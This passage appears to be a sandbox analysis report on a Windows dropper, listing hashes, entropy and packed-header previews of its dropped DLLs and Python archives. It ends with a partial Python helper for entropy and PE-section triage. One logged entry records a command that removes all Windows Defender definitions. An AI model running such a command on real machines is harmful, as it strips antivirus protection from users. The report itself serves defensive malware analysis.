Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u...SUjIron.../....Kso.;y.}.r..6..B.}'@............G....l......A ....D.H..H.$...o....]...:%.(...k...Z{.S.-..\{.j..z..&.jB.;7...{...-.sF.......6..:....s.3_kD..H_F=.W/..=-}g.R?..P;..}.z.....#.v..#..d...V..Nzi.R..bG..(V..~B..}....q/.....1+........;...S....R...#..[..G<.S..|.+.2..xf...tE...}_{z...jI.WE\.....=.A.....;..9..aQ?di......Q..#-...........~.....P......m....}..Z...O.g.L.....S.4@l.3.%......P?.......~C......{+...o.v.R.{O..$...}a`.C....D.'.....+.}@....b.`...}...OD..+...1...Z..........q..{.0.<...3.q..wU....7.....{q....}1>...7.......a.^1g....{,.}....-..]..>..{.{.1.......+L.9.b;.X..O^..v.=.1...wY.Z....!......v...0..%.. Q...*6q.]a..q.....w..w...x{..p[j.w....m.......V0...k...-)o.......F.ZZb.O..u|...v.-..+6.c.......&..s.........}.nN.owK....lB.v..y...Yq...3n.}......!V.~S5o...Yq_....Z....qnF\.[....y........>1.....s....y..|......i7....7..ru=....=..
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):894
Entropy (8bit):3.1136093883777107
Encrypted:false
SSDEEP:12:Q58KRBubdpkoPAGdjrBN+NF5Zk9+MlWlLehW51IC4N+NFZI:QOaqdmOFdjrL+NC+kWResLID+Nc
MD5:98E7ECD40B422D1CD492C9D59903D500
SHA1:464AD4BA6919F574256C1BBD0FC4E09633264A34
SHA-256:D497018A7EFBF33BD58E8732A08F1C00B127B85C312675E9A4F00ABE99EB252C
SHA-512:A6C35D28B7DD8AA5B2BDC1617B7427BB347233D594E5194765EDCE5EB02E16955BB99406830E53DB0512BF2B5180D864732302AD3558D767427FB587443810FF
Malicious:false
Reputation:unknown
Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 1.9. .. 2.0.2.4. .1.6.:.1.1.:.1.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 1.9. .. 2.0.2.4. .1.6.:.1.1.:.1.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Thu Dec 19 22:19:55 2024, 1st section name ".debug$S"
Category:dropped
Size (bytes):1376
Entropy (8bit):4.117181464430057
Encrypted:false
SSDEEP:24:HmO9w65dyHMwK3NoxXNwI+ycuZhNQrakSpEPNnqSQEgd:h5EzK3NQm1ulSa3mqSZ0
MD5:F2D066593AF7D7F84517882C52FE1DA1
SHA1:4999F61F6CF6BC1C4A738E8EA9AC8D81276DD066
SHA-256:3DDB3642A7BA1152DE3CA80A1E9C119E59A4FC9E9885CE9DD3A58DCA87B93526
SHA-512:48011BA2DC84C2B9B6F3F6397D8F86C1D25AA977C9EED225A1E02D0B80E4E0D8EA44C99D3AE3102436E92D69450F1CD60A1F7297F8682161F9C622BD4F63811B
Malicious:false
Reputation:unknown
Preview:L.....dg.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........T....c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP................=...."S ..6.O...........5.......C:\Users\user\AppData\Local\Temp\RES2DEF.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.s.o.p.u.e.t...d.l.l.....(.....L.e.
Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):98224
Entropy (8bit):6.452201564717313
Encrypted:false
SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:F34EB034AA4A9735218686590CBA2E8B
SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):83736
Entropy (8bit):6.595094797707322
Encrypted:false
SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:86D1B2A9070CD7D52124126A357FF067
SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59672
Entropy (8bit):7.815495306851539
Encrypted:false
SSDEEP:1536:lAkx+GKRIxcWVGXWYOIDcPiBFCx/YzPILLPDM7SyGPxvI:ikx6uWX3xlBFCRYrILLPDMkxA
MD5:31859B9A99A29127C4236968B87DBCBB
SHA1:29B4EE82AA026C10FE8A4F43B40CBD8EC7EA71E5
SHA-256:644712C3475BE7F02C2493D75E6A831372D01243ACA61AA8A1418F57E6D0B713
SHA-512:FEC3AB9CE032E02C432D714DE0D764AAB83917129A5E6EECA21526B03176DA68DA08024D676BC0032200B2D2652E6D442CA2F1EF710A7408BD198995883A943A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." .............p...........................................@............`.........................................H<.......9.......0..........D............<.......................................%..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109336
                                                                                                                                                                                                                                        Entropy (8bit):7.935778322595252
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
                                                                                                                                                                                                                                        MD5:7CDC590AC9B4FFA52C8223823B648E5C
                                                                                                                                                                                                                                        SHA1:C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
                                                                                                                                                                                                                                        SHA-256:F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
                                                                                                                                                                                                                                        SHA-512:919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):36120
                                                                                                                                                                                                                                        Entropy (8bit):7.666263818459696
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
                                                                                                                                                                                                                                        MD5:659A5EFA39A45C204ADA71E1660A7226
                                                                                                                                                                                                                                        SHA1:1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
                                                                                                                                                                                                                                        SHA-256:B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
                                                                                                                                                                                                                                        SHA-512:386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87832
                                                                                                                                                                                                                                        Entropy (8bit):7.91873819228598
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:wZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfowoQmXsoILZ14T7SyiPxq:O7HdSpd+co4AhRiXT8aILZ14TIxq
                                                                                                                                                                                                                                        MD5:864B22495372FA4D8B18E1C535962AE2
                                                                                                                                                                                                                                        SHA1:8CFAEE73B7690B9731303199E3ED187B1C046A85
                                                                                                                                                                                                                                        SHA-256:FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
                                                                                                                                                                                                                                        SHA-512:9F26FE88ACA42C80EB39153708B2315A4154204FC423CA474860072DD68CCC00B7081E8ADB87EF9A26B9F64CD2F4334F64BC2F732CD47E3F44F6CF9CC16FA187
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26392
                                                                                                                                                                                                                                        Entropy (8bit):7.451874097949462
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:9Oa1OtK/srvmpp1ILQUe+5YiSyvz5PxWEaAc:cMV/X1ILQUe07SydPxDc
                                                                                                                                                                                                                                        MD5:BEBC7743E8AF7A812908FCB4CDD39168
                                                                                                                                                                                                                                        SHA1:00E9056E76C3F9B2A9BABA683EAA52ECFA367EDB
                                                                                                                                                                                                                                        SHA-256:CC275B2B053410C6391339149BAF5B58DF121A915D18B889F184BE02BEDAF9BC
                                                                                                                                                                                                                                        SHA-512:C56496C6396B8C3EC5EC52542061B2146EA80D986DFE13B0D4FEB7B5953C80663E34CCD7B7EE99C4344352492BE93F7D31F7830EC9EC2CA8A0C2055CB18FA8DB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):43800
                                                                                                                                                                                                                                        Entropy (8bit):7.716600949168409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Qp4KUJsCditRTPL/f9hpDd1ciTceZS/VgpjrpILLwjm/5YiSyv6PxWEads:QpghditRDL/1rcOcT/V4rpILLwjmx7Sd
                                                                                                                                                                                                                                        MD5:49F87AEC74FEA76792972022F6715C4D
                                                                                                                                                                                                                                        SHA1:ED1402BB0C80B36956EC9BAF750B96C7593911BD
                                                                                                                                                                                                                                        SHA-256:5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
                                                                                                                                                                                                                                        SHA-512:DE58D69228395827547E07695F70EF98CDAF041EBAAE0C3686246209254F0336A589B58D44B7776CCAE24A5BC03B9DC8354C768170B1771855F342EECC5FEAD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51480
                                                                                                                                                                                                                                        Entropy (8bit):7.7600775531574655
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:44+FRSaAh0lhSoqx1HuILOQzM7SywcPxC:4CMA0ILOQzMWMxC
                                                                                                                                                                                                                                        MD5:70A7050387359A0FAB75B042256B371F
                                                                                                                                                                                                                                        SHA1:5FFC6DFBADDB6829B1BFD478EFFB4917D42DFF85
                                                                                                                                                                                                                                        SHA-256:E168A1E229F57248253EAD19F60802B25DC0DBC717C9776E157B8878D2CA4F3D
                                                                                                                                                                                                                                        SHA-512:154FD26D4CA1E6A85E3B84CE9794A9D1EF6957C3BBA280D666686A0F14AA571AAEC20BAA0E869A78D4669F1F28EA333C0E9E4D3ECD51B25D34E46A0EF74EE735
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):63768
Entropy (8bit):7.844124998607476
Encrypted:false
SSDEEP:1536:cww8TGrTNdinN5kuAQZMXb4zdILC74+67SykPx1:FPTGrTmN5kHQZMXc5ILC74Tax1
MD5:9A7AB96204E505C760921B98E259A572
SHA1:39226C222D3C439A03EAC8F72B527A7704124A87
SHA-256:CAE09BBBB12AA339FD9226698E7C7F003A26A95390C7DC3A2D71A1E540508644
SHA-512:0F5F58FB47379B829EE70C631B3E107CDE6A69DC64E4C993FB281F2D5ADA926405CE29EA8B1F4F87ED14610E18133932C7273A1AA209A0394CC6332F2ABA7E58
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ......................................................................`.........................................p...d....................P..........................................................8...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):880569
Entropy (8bit):5.682980440617897
Encrypted:false
SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2Ya2xdOVwx/fpEh+rtSLMNA:lgYJiVBFLa2xTVwx/fpEh++MNA
MD5:3AE8624C9C1224F10A3135A7039C951F
SHA1:08C18204E598708BA5EA59E928EF80CA4485B592
SHA-256:64DFC4067A99C71094B4A9AA8E50344E7D42EA9A0D376CBCD419C04E53384285
SHA-512:C47EA6B8E004C27FA29E84F6363F97E775C83A239EB3AE75DEDCA79E69DB02B431A586877EE8F948F83B522B00C20E6B1D5864628C2AEF9E33E0BE95FE6E3254
Malicious:false
Reputation:unknown
Preview:PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):78659
Entropy (8bit):7.845766049779945
Encrypted:false
SSDEEP:1536:TF0OxohRSsvaG7jV/hU4/3jxMfDo9SXDFvk2ghof/fEwg4diA:TFdxiRnaGPkUTxYo9AUQ/fHg8/
MD5:EAB0B6A8927398748C079A04E3E0D959
SHA1:AA764930131B2EC0A37E79E5A7F797F833A2E572
SHA-256:7B9AAB58B8B85E77E57087235A3282A8F5ABBBE8DF4126F9185F0FDEC5429733
SHA-512:19D3145AAB532AF1C48866D74EB9FDB18AC2DF9793CC3E4B1860E8F039FC92EFE568C039AB3F23BC3181E691A9B237BE06C4B7B25D098CA71257570242B97F19
Malicious:false
Reputation:unknown
Preview:PK........ch.Y..z..2...2......stub-o.pyco.........dg'........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1112856
Entropy (8bit):7.937513332106868
Encrypted:false
SSDEEP:24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
MD5:BBC1FCB5792F226C82E3E958948CB3C3
SHA1:4D25857BCF0651D90725D4FB8DB03CCADA6540C3
SHA-256:9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
SHA-512:3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):24088
Entropy (8bit):7.527291720504194
Encrypted:false
SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
MD5:6F818913FAFE8E4DF7FEDC46131F201F
SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):209688
Entropy (8bit):7.925861479415686
Encrypted:false
SSDEEP:3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
MD5:AD0A2B4286A43A0EF05F452667E656DB
SHA1:A8835CA75768B5756AA2445CA33B16E18CEACB77
SHA-256:2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
SHA-512:CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1514776
Entropy (8bit):7.99244120733247
Encrypted:true
SSDEEP:24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
MD5:4A6AFA2200B1918C413D511C5A3C041C
SHA1:39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
SHA-256:BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
SHA-512:DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

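The dropped-file records above carry three triage signals a practitioner would want to reproduce locally: the 8-bit entropy and the Encrypted flag (true only for the 7.992-entropy DLL, false at 7.9375 and below), the hash set, and a header preview whose section names (UPX0, UPX1, .rsrc) and trailing "4.02 ... UPX!" marker identify UPX-packed x64 DLLs. The Python below is an editor's example added to this page, not Joe Sandbox code; it builds a constructed stand-in for one packed DLL and one stored zip (no real sample bytes), computes the same fields, walks the PE section table for UPX names, and flags the file as encrypted above a 7.99 entropy threshold. That threshold is an assumption inferred from the values on this page, not a documented Joe Sandbox constant.

```python
"""Triage helper that reproduces the dropped-file fields above for a local file.

Editor's example, not Joe Sandbox code. The PE bytes are constructed here,
not taken from any real sample.
"""
import hashlib
import math
import random
import struct

# Assumption: on this page the Encrypted flag is true at 7.992 and false at
# 7.9375, so 7.99 is an inferred cut-off, not a documented Joe Sandbox value.
ENCRYPTED_ENTROPY_THRESHOLD = 7.99


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 max."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list[str]:
    """Walk MZ -> e_lfanew -> COFF header -> section table and return the names.

    Raises ValueError for anything that is not a PE image (e.g. the stored zip
    archives in the same drop set) so callers can fall through cleanly.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]    # COFF.NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]       # COFF.SizeOfOptionalHeader
    table = e_lfanew + 4 + 20 + opt_size                              # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
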